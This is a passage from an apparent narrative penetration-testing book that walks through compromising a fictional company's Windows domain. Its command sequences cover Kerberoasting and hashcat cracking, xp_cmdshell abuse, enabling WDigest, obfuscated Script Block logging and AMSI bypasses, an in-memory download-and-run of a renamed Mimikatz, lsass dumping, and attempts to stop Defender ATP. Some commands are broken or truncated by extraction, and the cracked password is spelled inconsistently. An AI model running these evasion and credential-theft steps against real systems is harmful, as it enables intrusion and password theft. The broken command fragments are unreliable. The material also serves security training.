from our Citrix server (in fact, in this case, we cannot reach it).

The previous Get-NetUser command only returned an SPN tied to

regular domain accounts. However, SPNs can be, and regularly are, tied
to machine accounts as well.

We can use this PowerShell borrowed from TechNet to list all SPN
aware services68. The DC, for instance, has many SPNs tied to its
machine account STRAT-AD-01$: Ldap service, RDP or TERMSRV,
DNS service, etc.

By analyzing the list of SPNs gathered (machines, services and

ports), we deduce that SQL databases are almost all located in the same
network segment.

PS X:\> nslookup strat-ci-03

Name: strat-ci-01.stratjumbo.lan

PS X:\> nslookup strat-ak-03

Name: strat-ak-03.stratjumbo.lan

STRAT-CI-03 is most likely the Citrix database, given the naming
similarity with the XenApp server we currently are on (STRAT-CI-01).
This conclusion is further reinforced by the fact that STRAT-CI-03 is the
only database we can reach from our current network segment:

PS X:\> ping strat-ci-03

Pinging strat-ci-03.stratjumbo.lan [] with 32 bytes

of data:

Reply from bytes=32 time=94ms TTL=128


After all, it makes sense that all Citrix servers should be able to
communicate with their database at some point to retrieve objects, user-
session mappings, etc.

Chances are that the Citrix database can communicate freely with
other databases in the same sub network. Thus, if we manage to gain
control over this one single database, we could pivot to other databases
and look for credentials in memory, passwords in scripts, and maybe
even development source code.

We still need to figure out how to first attack this database. Fear not,
this is where Kerberos’ magic comes into play once more. Indulge my
small digression about the topic to introduce the next attack.

When a user initiates an authentication process to a service (identified

by their SPN), the following steps take place:

• Users encrypt the current timestamp with their password hash

and send it to the Domain Controller.

• The DC decrypts the timestamp using the hash stored in Active

Directory and checks if it falls within the ten-minute range. It then
sends back a blob of encrypted data—the ticket-granting ticket
(TGT)—containing the users’ identity and their privileges. Only the
DC can decrypt and read the TGT.

• Later on, a user that wants to access a web service, a database, or

any other service in the domain, contacts the DC once more and
blindly sends back the TGT along with the desired service’s name.
The DC verifies the authenticity of the TGT and sends back a ticket-
granting service (TGS), which is an encrypted blob of data
containing the user’s identity. The TGS ticket can only be read by
the target service.
• The user blindly forwards the TGS to the target service, which
decrypts data, retrieves the user’s identity and grants access.

We have purposely left out the many session key exchanges in the
process to symmetrically encrypt data since they do not serve our
immediate purposes. Instead, we will focus on the TGS ticket—the
encrypted blob of data containing the user’s identity. This ticket is
encrypted with the service account’s NTLM hash, i.e., its password.

This is where it gets interesting. Anyone in the domain can request a

TGS ticket, whether they actually have access to the service or not. The
KDC does not care, it just distributes encrypted blobs of information.

What can we do with this encrypted information? Crack it looking for

the secret key, of course! In this case, the key is the service’s domain

This technique is dubbed Kerberoasting. Will Shroëder created a nice

summary of the history of the attack in his blog (

The great thing about this attack is that it is completely legit, both from
a system and network point of view. TGS requests to access a service
(windows machine, network share, SQL server, etc.) happen all the time,
so ATA has a hard time coming up with a valid signature to flag this attack.

Behavioral analysis might pick up massive and successive TGS tickets

requests to the DC, though it will yield a depressing number of false
positives as it is a standard and recurring event, especially in a Citrix

As an extra precaution, we will only request a couple of TGS tickets

for accounts running SQL Server databases: sqlexpress and
sqlexpress2. For that, we will use the Invoke-Kerberoasting PowerShell

We do not need to worry too much about obfuscating our payload since
we have already bypassed Script Block logging:

#In the PowerShell window, prepare a browser object

PS X:\> $browser = New-Object System.Net.WebClient;
PS X:\> $browser.Proxy.Credentials

#Download PowerView
PS X:\>
-Kerberoast.ps1 "));

#Call Invoke-Kerberoast
PS X:\> Invoke-Kerberoast -OutputFormat hashcat -LDAPFilter
'(SamAccountName=*sql*)' | out-file hash.txt





We get a list of all user account hashes in a format compatible with

Hashcat, the famous password cracker. The command to crack these
passwords is listed below, where “-m” refers to the Kerberos 5 TGS-
REP etype 2369 algorithm and wordlist.txt is a list of likely password

C:\HLL\Lab> .\hashcat64.exe -m 13100 hash.txt wordlist.txt

We could try cracking these passwords on our standard virtual private

server using default wordlists found on Kali but given the slow hashrate
of the Kerberos 5 TGS-REP algorithm (~150 times slower than NTLM), it
could take a while.

We need to optimize the shit out of this offline bruteforce attack!

As anyone familiar with cracking passwords knows, there are two

knobs we can tweak to speed up the process:

• Using top-notch wordlists that cover a wide variety of password

candidates, from keyboard walking (qwerty) to classic dictionary
words with the most common complexity patterns.

• Tuning up the cracking rig to use powerful graphic processing units
(GPU). In contrast with CPUs that are designed to sequentially run
instructions on their four or eight cores, GPUs favor parallel
operations distributed over thousands of less powerful cores. This
is ideal for an operation like cracking passwords, as it requires the
same instruction be applied to multiple sets of data with relatively
uncorrelated outputs.

Building your own password-cracking rig requires a certain amount of

investment and passion.

The hardware cost may be prohibitive unless you want to follow a part-
time mining hobby (then again, more specialized and cheaper cards can
be used for that purpose70) and the occasional electric bill might quickly
get salty.

As of 2018, the Nvidia GTX 1080 Ti71 is probably one of the best
graphic cards for cracking passwords. Below are benchmark reports of
running Hashcat on a single GTX 1080 Ti card72:


Hashtype: MD5
Speed.Dev.#1.....: 30963.5 MH/s (55.28ms)

Hashtype: Kerberos 5 TGS-REP etype 23

Speed.Dev.#1.....: 413.8 MH/s (70.91ms)


Cracking Kerberos 5 TGS-REP hashes is 74 times slower than

cracking MD5, hence the need for massive GPU power. Combining six
of these bad boys—each costing around $1100—will sky-rocket cracking
Kerberos TGS tickets to around 2.4 billion hashes per second. Coupled
with a physical computer with 16 or 32Gb of RAM, this rig should
reasonably cover our needs.

If investing in GPU cards does not appeal to the hacker and gamer
inside of you, you can always take advantage of cloud GPU computing
such as AWS, PaperSpace, OVH, Google, etc.

One of the main limitations of this setup, however, is the power of the
graphics cards offered. Most cloud providers rely on the Tesla K80 card
for their default instances, which is around 13 times less performant than
the GTX 1080 Ti model. Below is a benchmark for cracking Kerberos
TGS tickets using popular graphics cards to give you an idea73 :
• 1× Tesla K80: 31.5 MH/s
• 1× Tesla M60: 141.6 MH/s
• 1× GTX 1080: 291.4 MH/s
• 1× GTX 1080 Ti: 413.8 MH/s
• 1× Tesla V100: 1008.4 MH/s

Only the 16xP3 instance on Amazon AWS uses V100 cards (eight of
them) reaching a hash rate of over eight billion hashes per second for
cracking Kerberos TGS tickets. If that’s not enough to break Strat
Jumbo’s hashes, I don’t know what will.

Running this type of machine for 48 hours straight would cost

approximately as much as buying a single NVDIA GTX 1080 Ti card
builder reference (i.e., ~$1100).

In the end, it is only a matter of following the investment strategy that

best suits your needs. We can opt for any of the following scenarios and
still end up with a pretty decent cracking rig:

• Tall performance: renting a P2x8 instance on Amazon AWS (8x

Tesla K80) for $7.2 per hour (~ $172 for 24 hours) – 248 MH/s

• Grande performance: buying 6x GTX 1080 for $5640 – 1746 MH/s

• Venti performance: buying 6x GTX 1080 Ti for $6600 – 2476 MH/s

• Astounding performance: renting 16xP3 instance on Amazon AWS

(8x Tesla V100) for $24/hour ( ~ $576 for 24 hours) – 8067 MH/s

Say we opt for a modest scenario whereby we rent a P2x8 instance

(248 MH/s) on Amazon for 24 hours. To compensate for the relative lack
of power, we ought to build a strong wordlist for Hashcat to go through.

73More information on
When building your wordlist repertoire, always prioritize quality over
quantity. The size of a wordlist hardly matters for the simple reason that
we will likely increase it many orders of magnitude over using custom
rules (adding numbers, special characters, etc.).

Not many people (admins and users alike) will choose “1bNoJeG%B”
as corporate passwords. And even if, by some miracle, they did choose
such a random password, it would take us months/years to exhaust all
the nine-character spaces to find it (when cracking Kerberos TGS ticket).

So clearly there is no point in targeting these random passwords when

building our wordlists; rather, it is much more efficient to target passwords
that are human-generated and therefore follow some form of mnemonic

People use words and scenes they remember to form the root of their
passwords, so we need to look for wordlists listing names, places,
seasons, music bands, cities, as well as words related to Strat Jumbo’s
activity (programming and finance).

There are many themed wordlists on the Internet, but one of the most
complete and diversified is the one released by crackstation.net74, over
1,4 billion candidates including words extracted from Wikipedia, the
Gutenberg project, etc. This is a great input source that spans multiple

To adapt this wordlist to our current target, we further expand it by

adding words extracted from Strat Jumbo’s website. We can use the
following script for instance (

root@C2Server:~# python

root@C2Server:~# sort -u wordlist.txt >

scrapped_wordlist.txt| wc -l


We add these words to the mix and produce a unified wordlist

composed of unique and sorted candidates. We can even throw in a few
hundred thousand words from the Game of Thrones universe since their
admins seem to like it so much.

root@C2Server:~# python

To these billions of viable candidates, we must apply rules or masks

to transform them into potential passwords while respecting Strat
Jumbo’s password policy of a minimum eight characters and three
character classes (uppercase, lowercase, numbers or special

A great number of people competed to create the best and most

efficient rules to cover trivial and obscure combinations alike, from
KoreLogic’s famous rulesets75 to random Github repositories 76.

It is my personal opinion that most of these rulesets try too hard to

catch those 1% passwords that elude password crackers, instead of
mimicking actual passwords used by frustrated employees trying to cope
with increasingly stringent password policies.

The RockYou77 ruleset is a very good start for instance, but it does
not account for obvious combinations (leet letters followed by numbers,
special characters followed by numbers, capitalized first letter, and
prepended numbers or special characters, etc.).

To this end, I devised my own wordlist that you can find on the
following link78. I usually run it alongside the RockYou ruleset.

So far, this combination has proved to be very efficient, though it is

subject to continuous improvement, of course. For each password
candidate, the combination of these rulesets yields around 34,000 new

C:\> .\hashcat64.exe -m 13100 hash.txt example_wordlist.txt -r

Progress.........: 34601/34601 (100.00%)
Rejected.........: 0/34601 (0.00%)
Restore.Point....: 1/1 (100.00%)
Candidates.#1....: Example!@#$ -> Example!@#$%

Applying this ruleset to 1000 candidates yields a total of 34M
passwords, which might seem like a big number, but our platform (248
MH/s) would exhaust this key space in around one-tenth of a second

Extrapolating these figures shows that in order to keep this machine

busy for 24 hours, it would require that around 664 Million passwords be
fed to our ruleset, which is 34,000 lines long.

Depending on our budget, we might want to cut short the Crackstation

wordlist to fit into 24 hours, or maybe use fewer rules. It is all about
choosing the right balance to fit into our budget but still have a decent
chance of cracking passwords:

C:\> .\hashcat64.exe -m 13100 hash.txt complete_wordlist.txt -r


To further push the boundaries of password cracking, we take

advantage of another powerful principle:

Human nature is the same worldwide!

An old password is someone else’s new one. By harvesting

passwords previously leaked during major breaches, we can create a
very efficient wordlist that, unlike regular wordlists, needs no rule
processing. These are, after all, real passwords that probably respected
similar password complexity rules.

This saves us a huge amount of computing power. The website

hashes.org79 has close to 76 leaked passwords lists (550 Million real
passwords in total), whereas the following link lists close to 2 Billion
leaked passwords80.

Armed with all these candidates, we run two instances of the latest
Hashcat on our AWS GPU platform, one without rule processing using
leaked passwords and the other with full-on custom rules. We will come
back in a couple of hours or days to check the results:

C:\> .\hashcat64.exe -m 13100 hash.txt complete_wordlist.txt -r


03:14488*$87... 99fa91d:L3ic3st3r@87

Recovered........: 2/5 (40.00%) Digests, 2/5 (40.00%) Salts
Candidates.#1....: burnout -> L3ic3st3r@87

...And we’ve got it, sqlexpress / L3ic3st3r@87. It’s not a trivial

password that you would get using regular rules, mind you, but given the
large number of rulesets and the proper base word, it was inevitable!
Finally free
Amidst the thrill of this significant new opportunity in the grim world
that is Strat Jumbo’s defensive network, we cannot wait to test this
account on Citrix’s own database. But hold your horses! Opening a new
interactive session (RDP or SQL) on a random server is not to be taken
lightly, especially with ATA lurking around.

If we are lucky, maybe some admins regularly initiate RDP/SQL

connections to the database using the sqlexpress account. Odds are,
however, that this account is only used locally to run the database’s

Administration tasks are usually carried out using nominative

accounts—or at least Strat Jumbo’s naming convention seems to
suggest so. Citrix’s own connections will also most likely rely on a
dedicated account.

If we open a remote connection (SQL or RDP) using the service

account sqlexpress, we will surely get flagged by ATA as initiating an
unusual behavior. Not too bright.

Fortunately, there is more than one way to connect to an SQL server.

One is through the Kerberos protocol using the SQL server (sqlexpress)
domain account, but another subtler way is through the built-in “sa”
account, which more often than not has the same password as the SQL
service account.

The “sa” account—since it is a local account defined in the

database—does not register Windows logs, nor does it interact with the
DC. ATA is, therefore, completely oblivious to the attack.

A simple PowerShell script ( will help alleviate our


#In the PowerShell window, prepare a browser object

PS X:\> $browser = New-Object System.Net.WebClient
PS X:\>$browser.Proxy.Credentials

#Download the Invoke-SQL script

PS X:\>
PS X:\> Invoke-SqlCommand -server STRAT-CI-03 -database master -
username sa -password L3c3ist3r@87 -query "EXEC sp_databases"

Brilliant! Now once we are in the database, we can unlock the

“xp_cmdshell” procedure to execute commands on the server:

#Activate the xp_cmdshell

PS X:\> $sql = "EXEC sp_configure 'show advanced
options',1;reconfigure; exec sp_configure

PS X:\> Invoke-SqlCommand -server STRAT-CI-03 -database master -

username sa -password L3c3ist3r@87 -query $sql

#Executing a system command

PS X:\> $command='net localgroup administrators'

PS X:\> Invoke-SqlCommand -server STRAT-CI-03 -database master -

username sa -password L3c3ist3r@87 -query "EXEC xp_cmdshell

What do you know! Sqlexpress is part of the local admin group on the
STRAT-CI-03 server! The first server we really pwn inside Strat Jumbo’s

Pwning this Citrix database is a crucial move in penetrating Strat

Jumbo’s deep infrastructure. Remember the list of databases we could
not reach from the Citrix server because of the firewall protections?
That’s old news now.

By channeling our packets through STRAT-CI-03—which is located

inside a more trusted network segment—we can reach a lot more

#Executing the whoami command

PS X:\> $command='ping STRAT-AK-03'
PS X:\> Invoke-SqlCommand -server STRAT-CI-03 -database master -
username sa -password L3c3ist3r@87 -query "EXEC xp_cmdshell

At this point, we still don’t know which machines to target in order to

get Strat Accounting’s source code, so we will have to stick with what we
do know—the users the are part of the seven groups dev groups we
located earlier:

SNOW jack.bosa, jake.sparrow...

YGRITTE lizzie.dutch...

CERSEI mozzie.caffrey,lucilla.silvy...

TYRION neil.cobbo...

DAENERYS cassini.morini, carl.sagan...

RHAEGAR janet.mcintyre, rodolpho.schwatz, jim.marrot...

TYWIN tara.tomora...

BAELISH elise.first, anya.ivanova...

TORMUND ron.bilius, richard.darwin, david.stuart...

ARYA laura.stevens, monica.fourb...

We do not expect these users to be connected on the Citrix database

server, so forget about grabbing their passwords with Mimikatz. However,
there is another interesting account, which I hoped you noticed in the
previous figure and that might prove just as useful: Citrix_srv

This is the same Citrix_srv account that holds admin privileges over
the Citrix server farm. This account would automatically grant us access
to passwords stored in XenApp’s servers’ memory.
These machines are usually a bottleneck of interactive sessions, so
Mimikatz will likely harvest a few dozen passwords every hour. Hopefully,
a few of these accounts will have relevant documents in their personal
folders or browser history and will shed some light on the project naming

Now, let’s get back to our use case involving a Mimikatz on the

Since we are dealing with a new Windows Server 2016, we first need
to turn on the WDigest service provider that stores passwords in a
reversible format, otherwise Mimikatz will only grab NTLM hashes, which
we could obviously crack using or ultimate password cracking rig, but
turning on WDigest is a much simpler (and cheaper) alternative:

PS X:\> $command='reg add

/v UseLogonCredential /t REG_DWORD /d 1'

PS X:\> Invoke-SqlCommand -server STRAT-CI-03 -database master -

username sa -password L3c3ist3r@87 -query "EXEC xp_cmdshell

Next time the Citrix_srv connects to the server, its password will be
stored in a reversible format where Mimikatz can easily decrypt it.

Our next step is to test the classic Invoke-Mimikatz PowerShell81 on a

similar server in our test lab to make sure everything runs smoothly. As
usual, we load it in memory using Invoke-Expression to evade the
Windows Defender antivirus:

Huh?! It gets picked up anyway!

Remember when we used to loudly and somewhat arrogantly declare
that antivirus products could only scan files on disk and are therefore
easily bypassed? Try saying that at a hacking conference now without
someone throwing you a brochure of a “next-gen” product. Even
Microsoft made sure to address the issue by introducing a native feature
called AMSI on their Windows 10 and Server 2016 releases.

AMSI is an engine that intercepts scripting commands right before

execution and sends them to the antivirus for analysis. It does not matter
whether the script was loaded from disk, a registry, or memory because
AMSI acts at the scripting engine level (WMF). This also means that
classic obfuscation techniques, like base64 and runtime encryption, will
only help to a limited extent. It all depends on the signature model of the
underlying antivirus.

Since we are admins on the box, we could just disable AMSI using
the built-in Set-MpPreference command (available only in elevated

PS C:\> Set-MpPreference -DisableIOAVProtection $true

However, expect a log event (ID 5100) to be forwarded to the QRadar

SIEM that could, and most certainly should, be monitoring these alerts.
Not too stealthy.

Fortunately, we have alternatives that work just as fine and with much
less noise. Matt Graeber, leveraging the all-powerful Reflection
technique, came up with a one-line command to disable AMSI82. Another
interesting compilation of several bypasses can be found at the following
link, courtesy of Sam Ratashok (

Upon initialization, the AmsiUtils class checks the amsiInitFailed

variable to ensure that all modules loaded properly. If we set this variable,
using Reflection, to True, we can effectively disable AMSI for the rest of
the PowerShell session. The best part is that this trick does not require
admin privileges:

PS C:\>

This all works just fine, but as expected, the previous command to
disable AMSI is automatically flagged as a warning event (4101). We
need to add a layer of obfuscation or disable Script Block logging
altogether, just like we previously did83.

Additionally, and just to be on the safe side, we can slightly alter the
Invoke-Mimikatz script to make it less obvious for future nosy forensic
examiners: remove comments, change function and parameter names,

The following operations, which are essentially just string replacement

commands, should fool most static analysis tools (courtesy of Carrie

root@C2Server:~# sed -i -e 's/Invoke-Mimikatz/Invoke-Wee/g'


root@C2Server:~# sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

root@C2Server:~# sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-


root@C2Server:~# sed -i -e 's/DumpCreds/DumpCred/g' Invoke-


root@C2Server:~# sed -i -e 's/ArgumentPtr/NotTodayPal/g'


root@C2Server:~# sed -i -e

root@C2Server:~# sed -i -e "s/\-Win32Functions


83 An interesting alternative used by the InsecurePowerShell project is to drop a

fake amsi.dll in the same folder of the PowerShell executable and thus hijack the
loading process
\$Win32Functions #\-/g" Invoke-Mimikatz.ps1

root@C2Server:~# mv Invoke-Mimikatz.ps1 Invoke-wee.ps1

When we combine the Script Block bypass routine, AMSI, and the
new Invoke-Wee script, the result looks something like this:

# Disable ScriptBlock Logging

$GPF =
tF`Ield"('cachedGroupPolicySettings', 'NonP'+'ublic,Static');
$GPS = $GPF.GetValue($null);
$GPS['Script'+'BlockLogging']['EnableS'+'criptBlockLogging'] =
ionLoggi'+'ng'] = 0;

# Disable AMSI

# Create new browser request

$browser = New-Object System.Net.WebClient;

# Copy proxy settings


# Download Invoke-wee (mimikatz) and execute it in memory



The usual way to go about executing this script remotely on the

database is to first encode it in base64, then launch it through
xp_cmdshell using the following command:

EXEC xp_cmdshell "powershell.exe -enc <encoded_script>"

While this is a sound method that alleviates much of the pain

associated with escaping quotes and brackets on PowerShell, its wide
use by many malware programs made it an obvious red flag that is
actively monitored by many security products. Therefore, I find it
worthwhile to use another technique altogether to achieve the same
Instead of storing our script in a file, registry or encoding it in base64,
we will store it in an environment variable on the remote database, using
the set command:

PS X:\> $command="set

Then it is simply a matter of retrieving this variable from PowerShell

and executing its content using the less suspicious “-command” switch:

PS X:\> $command= $command + ' && powershell -command "(get-item

Env:cmd).value | iex"'

We embed the command variable storing our payload into an SQL

request and execute it on the remote database using xp_commandshell:

PS X:\> Invoke-SqlCommand -server STRAT-CI-03 -database master -

username sa -password L3c3ist3r@87 -query "EXEC xp_cmdshell

And lo and behold, we have the Citrix_srv password!

We use this account to open a new session on the Citrix server. Since
we are now part of the admin group, we are no longer subject to
Applocker’s policies and thus Powershell’s Constrained mode. Both
limitations are magically lifted—not that they bothered us that much
anyway, but it sure makes it much easier from now on.

We have a trove of new applications available on this new session,

ranging from RDP (remote desktop session) to File Explorer.
By checking past or saved connections on the RDP application, for
example, we can limit our lateral propagation to those machines that
usually host interactive sessions belonging to the Citrix_srv account, thus
evading ATA’s unusual behavior detection.

As expected, this account is mainly used to managed XenApp

servers, so we are limited to three servers STRAT-CI-01, STRAT-CI-02
and STRAT-CI-03.

Still, that’s two more servers we can use to harvest passwords of

recently connected users.

We open a PowerShell session with admin privileges on STRAT-CI-

01, disable the Script Block warning, logging, AMSI, and then launch

It took a while to get here, but we have finally started pwning some
accounts! We relaunch Mimikatz a couple more times during the next few
hours to slowly populate all our dev groups:

SNOW Jack.bosa/Spa98row!%

YGRITTE Lizzie.dutch/Holi_day_213

DAENERYS Cassini.morini/Dragons*fire
Janet.mcentire/ Molly_Dorian10

TORMUND Richard.darwin/Greatest-Show-

To increase our odds and speed up the process, we run similar

commands on the next two XenApp servers.
**Notes on ATA**

As you can see, in this scenario, we did not try to defeat ATA by bluntly
trying to bypass its signature detection module. We simply went with the
flow and paid careful attention to packets emitted by each of our
commands in order to blend in as much as possible with existing traffic.

We could have taken the hard approach and redesigned our tools to avoid
triggering ATA’s signature module.

For instance, when forging Kerberos tickets, ATA only flags the fact that
we request a Kerberos ticket using an NTLM hash. If we issue the same
request using AES 256 and 128 hashes (retrieved by Mimikatz as well),
we do not get a single beep.

There is much to be said about using these little tricks to defeat ATA at its
own game. If you are curious about the subject you can check out this
awesome talk at Black Hat 2017 (

Defeating the machines

All in all, after a few hours, we have collected around twenty-five
accounts, which is a pretty decent number given the limited set of
compromised assets, but it hardly fills our dev groups. We still need users
from the TYRION, TYWIN and BAELISH groups to hit the jackpot.

If you look carefully at the Citrix dashboard, though, there is another

machine we did not yet fully explore—the virtual desktop (VDI) available
to the Citrix_srv account:

While companies usually publish Citrix applications on servers, virtual

desktops or XenDesktops are running on shared Windows desktops to
simulate a regular desktop experience:
A quick quser command shows eight users concurrently connected
on the machine:

C:\users\citrix_srv> quser
>citrix_srv rdp-tcp#3 1 Active 3/8/2018 11:00 PM
neal.strauss rdp-tcp#4 2 Active 3/8/2018 09:12 PM
barry.lois rdp-tcp#5 3 Active 3/8/2018 09:20 PM
anya.ivanova rdp-tcp#6 4 Active 3/8/2018 09:22 PM
elise.first rdp-tcp#7 4 Active 3/8/2018 10:54 PM

That’s a pretty sweet pot. If we can manage to run Mimikatz on this

machine, we will score a substantial loot, especially since these user
accounts help us populate all the remaining groups!

However, before going commando on this machine, experience has

taught us (the hard way) to take our time and first conduct some light
reconnaissance. After all, this is our first Windows desktop machine in
Strat Jumbo’s environment.

We start by listing the operating system’s version, build number,

running processes and services:

C:\> wmic os get buildnumber ,caption

C:\> wmic process get description,ExecutablePath

C:\> wmic service where (state="running") get Name, Caption,

State, ServiceType, StartMode, pathname

C:\> wmic useraccount

We are on a Windows 10.0.16299, aka Fall Creators Update or

RedStone 3.
**Notes Windows 10**

Windows 10 versioning might raise a good deal of questions for those not
familiar with the new concept of the “operating system as a service”.
Indeed, Microsoft decided to continuously update the core functionalities
(not simply bug fixes like they previously did) of Windows 10 throughout
its lifetime.

Every six months or so, a new major update is released that changes the
major build number and adds new features.

It all started with Windows 10 Threshold in the Summer of 2015, build

1507. Then, just five months later, we had Windows 10 Threshold 2, build
number 1511.

This continued all the way up to Windows Redstone 4, build number

1803, which is scheduled to be released in April 201884.

Windows Defender is up and running as usual. However, one

particular service running on the machine stands out:

MsSense.exe, while part of the Windows Defender suite, has nothing

to do with the classic Microsoft antivirus solution. It is part of Microsoft’s
next-gen endpoint detection and response solution called Windows
Defender Advanced Threat Protection 85. It is an anti-malware solution
based on machine learning that detects post-breach advanced attacks.

Given that we already have control of a few servers to steal Citrix

credentials, maybe it is simply not worth it to fight ATP over eight silly
passwords that we could probably get on the servers by waiting for a few
more days—but let’s be crazy this time and take on the challenge!

To prepare for our upcoming battle, we register for a trial version of
Windows Defender ATP86 and install it on a test machine. The registration
process takes 24 hours and the installation procedure less than a few
seconds since all Windows 10 machines come with the ATP service pre-


Kudos to Microsoft for allowing security researchers to download and test

their products.

That much cannot be said of other vendors who shy away from
presenting their products to security researchers while shoving them
down the throat of board executives.

Ultimately, our goal is to dump clear-text passwords stored in the

infamous Lsass process. However, as soon as we move on to execute a
nifty in-memory Invoke-Mimikatz.ps1, ATP shows the following alert on
our test platform:

Interestingly, it did not pick up the suspicious access to LSASS’

memory, nor did it really flag the commands that you see in the
screenshot above.

ATP just happens to list system activity leading up to the suspicious

behavior or command it flagged—in this case, a specific PowerShell
command that was called sometime between the functions Test-
MemoryRangeValid and Update-MemoryAddress.

We try applying a layer of obfuscation to possible suspicious function

names within Invoke-Mimikatz.ps1, but it does not really solve the issue,
as sometimes the script is still picked up under a “credential theft” alert
with no details whatsoever:

Other times, it is not picked up at all, but the classic AMSI bypass is:

However, the same AMSI command is not flagged when heavily


PS X:\> Sv('R9'+'HYt') ( " )

+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-
ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT')
-val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)])

This last test clearly demonstrates that at least some part of the
detection algorithm is based on known suspicious string patterns.
Otherwise, no matter what the payload is, it should be able to tell when
AMSI is disabled.

At the same time, however, there seems to be some learning behavior

going on, which explains the inconsistent results between payload
executions. Our repeated execution of “weird” PowerShell commands
may well skew our own ATP instance into tolerating this behavior as part
of the nominal activity on the machine. However, when executing these
same commands in another environment, all alerts fire up.

This kind of erratic and context-specific behavior displayed by

Windows ATP is deeply unsettling. It is hard to be 100% sure of any given
payload. It’s like playing a minesweepers game, the best we can do is
appreciate a move’s safety based on probabilistic values and hope for
the best...

The only consistent observation we can state for sure however, is that
any script bearing the slightest resemblance to the Empire PowerShell
project is almost automatically flagged.
Moving inside a company’s network with this kind of unpredictable
solution monitoring every command executed is painful to say the least
and offers few assurances. So let’s devise a way to completely bypass it,
shall we?

If you think about it, all that Mimikatz does is extract secrets stored in
the lsass.exe process responsible for handling Windows authentication.
We may not be able to perform a live analysis of the process while it is
running on the machine, but nothing forbids us from dumping its content
to a file and then feeding it offline to a Mimikatz running on our machine!

Forget about procdump.exe and Out-Minidump87 —the latter gets

flagged anyway— there is a very simple and legit way to make a process
dump on Windows 10 using the good old task manager!

Now we wait. And wait... and nothing happens! Not a single beep from
Windows ATP, which is odd because what legitimate use can someone
get from dumping lsass.exe?

Anyway, now that we have a somewhat safe technique that flies under
ATP’s radar, we can turn our attention back to Strat Jumbo’s virtual

We start by enabling the WDigest provider on the XenDesktop to store

future passwords in a reversible format.

C:\> reg add

/v UseLogonCredential /t REG_DWORD /d 1


To force users into re-entering their credentials, we can always terminate
their RDP sessions. Though it might seem brutal, the fact is users
frequently lose their Citrix sessions due to connectivity issues, latency or
default lockout time.

We start by listing sessions using “query session” then run a “tsdiscon”

command against each of them:

C:\> query session

> rdp-tcp#87 citrix_srv 1 Active
rdp-tcp#8 2 Active
chandler.bong 3 Disc

C:\> tsdiscon 2

We come back a couple of hours later to collect the Lsass image using
the task manager as shown previously. To extract secrets from this dump
file, we load it in a Mimikatz running on a similar machine in our lab
environment (i.e., a Windows 10 or Server 2016 64-bit). Obviously, we
can easily disable the antivirus on our own machine without fearing
potential fallouts:

mimikatz# sekurlsa::minidump lsass.dmp

Switch to MINIDUMP : 'lsass.dmp'

mimikatz# sekurlsa::logonpasswords
* Username : Elise.First
* Password : Foryou09
* Username : anya.ivanova
* Password : Monet-#

And that’s how it’s done! We finally cover all Strat Jumbo’s dev

SNOW Jack.bosa/Spa98row!%

YGRITTE Lizzie.dutch/Holi_day_213
DAENERYS Cassini.morini/Dragons*fire
Janet.mcentire/ Molly_Dorian10
TYWIN Tara.tomora/Checkme$
Anya.ivanova/ Monet-#
TORMUND Richard.darwin/Greatest-Show-

For all intents and purposes, we are done with this workstation. We
got in, bypassed detection, and got the clear-text passwords.

But it would not be totally fair play to leave it at that now, would it?
Most advanced hacking tools perform heavy memory manipulation like
DLL injection, registering a driver, patching memory bytes, etc.

We can find a couple of workarounds to bypass ATP (heavy

obfuscation, native windows API calls, etc.) but it quickly becomes a
painful task to rewrite our whole scripting arsenal just to cope with ATP’s
annoying habit of peering over our shoulders.

So, before closing this ATP chapter, let’s deal once and for all with the
real issue—ATP itself!

Windows ATP relies on two main services to function properly:

• A service named Sense which starts the MsSense executable file

and is the main process behind ATP.
• A service named DiagTrack that is used to collect telemetry data
including ATP information. The corresponding process is

To completely disable ATP, we can either target the Sense service

(mssense.exe) and cripple the agent or terminate the DiagTrack service
(diagtrack.exe) to blind the cloud console.

However, stopping these services, and their related processes, is not

the easy task you might expect, even when holding local admin

On Windows RedStone 3 Creator Update 1706, the Sense service is

tagged as NOT_STOPPABLE. Even an admin cannot shut it down easily:
DiagTrack, however, is not marked as such, so we can stop it using
the “sc stop diagtrack” command. Unfortunately, ATP (Sense) just
restarts it when it needs to communicate with the cloud console.

To shut it down for good, we need to mess with the binary path
pointing to the executable file on disk, but we are then hit with an access
denied error:

The reason for this error is that both the Sense and DiagTrack
services are tagged as Windows light protected services88.

Service protection is a security feature implemented since Windows

8.1 to shield some user-mode processes from certain attacks, even when
performed through an admin account, like process injection, memory
manipulation, terminating a process, etc.

Technically speaking, a process marked as protected has a

corresponding flag (ProtectionInfo) in its E_PROCESS structure set to a
positive value (depending on the protection level89). An E_PROCESS
structure lives in the kernel space and thus requires loading a driver (or
using a kernel exploit) on the system to overwrite it.

Registering a driver on Windows 10 requires an EV certificate, which
costs around $44990 not factoring in identity checks. Some tools that
disable the protected flag like PPLKiller91 and Mimikatz come with their
own signed drivers and offer the option to disable process protection:

C:\> sc create pplkiller

binPath=C:\Windows\System32\drivers\pplkiller.sys type= kernel

C:\> sc start pplkiller

However, ATP picks up Mimikatz’s driver and it’s only a matter of time
before it picks up PPLKiller’s. After all, we cannot change the driver’s
name without requesting a new valid EV certificate, which considerably
limits our maneuver.

Thankfully, there is another quieter and more reliable route.

If you dig deeper into Microsoft’s description of its protected process,

it states that “only trusted callers can stop the [protected] service”. What
do they mean by trusted callers?

It turns out that there is a service called TrustedInstaller which has

the duty of managing protected services and other critical resources on
the system. It is this service that, for example, can rename/delete
sensitive files like C:\windows\system32\cmd.exe:

As you can see above, the “NT Service\TrustedInstaller” virtual group,

which is tied to the TrustedInstaller service, is given full authority over the
cmd.exe file. The same is true for light protected services like DiagTrack
and Sense!

The weird part, though, is that the TrustedInstaller service is not

tagged as a protected service. Some kind of an infinite regression
paradox, I guess:

In any case, this means that we can use our admin privileges to
change the Trustedinstaller’s binary path to launch a command prompt
that automatically stops the Sense service related to ATP:

C:\> sc config TrustedInstaller binPath= "cmd /C sc stop sense"

&& sc start TrustedInstaller

Almost. We got blocked by Windows Defender and ATP, even when

attempting to use the stealthier WMI command instead:

PS C:\> Get-WmiObject win32_service -filter

"Name='trustedinstaller'" | Invoke-WmiMethod -Name Change -
ArgumentList @($null,$null,$null,$null,$null,"cmd /K sc stop

PS C:\> start-service trustedinstaller

